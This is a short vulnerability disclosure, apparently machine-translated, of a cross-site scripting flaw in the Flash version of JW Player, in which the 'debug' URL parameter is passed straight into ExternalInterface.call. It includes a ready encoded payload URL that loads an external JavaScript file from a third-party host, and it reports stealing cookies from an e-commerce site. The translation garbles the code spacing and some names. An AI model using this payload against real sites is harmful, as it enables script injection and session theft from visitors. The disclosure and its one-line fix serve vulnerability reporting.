JWPlayer Xss 0day [Flash programming security issues]

A Foreign Player uses more than one million websites. Official introduction: "LongTail Video is a New York-based startup that has pioneered the web video market. our flagship product the-JW Player-is active on over one million websites and streams billions of videos each month."
 
This FLASH version of the video player has a security issue in code writing. I can use the skills I used to perform cross-site attacks.
 
It doesn't matter whether the website is on its own, but other websites that use this player are hard to say.
 
For example, "where to go" in China and XX stations in the United States ..
Detailed description:
A Xss vulnerability in Alibaba player
 
Test Browser: IE, Firefox.
 
Test Platform: Win 7.
 
1. The Bug code in
 
Package com. longtailvideo. Audio Player. utils
Class Logger
Private static function send (_ arg1: String): void
 
If (ExternalInterface. available ){
ExternalInterface. call (_ config. debug, text); <--- directly use _ config. debug
};
 
2. the _ config. debug is directly used as the first parameter of ExternalInterface. call. and the _ config is loaded from loaderInfo. parameters. therefore, when we construct a link such as "Why player.swf? Debug = (function () {alert ('xxx')}) () ", the passed-in javascript code will be run.
 
3. Then we can use the trick location. href = 'javascript: "<script src = {js file url}> </script>" 'to load and run external javascript file.
 
Test encoded edevil code: www.2cto.com
 
Http://player.longtailvideo.com/player.swf? Debug = (function () % 7Blocation. href % 3D 'javascript % 3A % 22% 3 Cscript % 2 Fsrc % 3D % 5C '% 2F % 2Fappmaker.sinaapp.com % 5C % 2Ftest5. js % 5C '% 3E % 3C % 2 Fscript % 3E % 22' % 7D)
 
 
4. That's all
Proof of vulnerability:
1. Simple Alert
 
 
 

 
2. Stolen Cookies in a chinese e-commerce website.
 
 
Solution:
Limit the length of "debug" parameters and check its content.
 
Author: ainover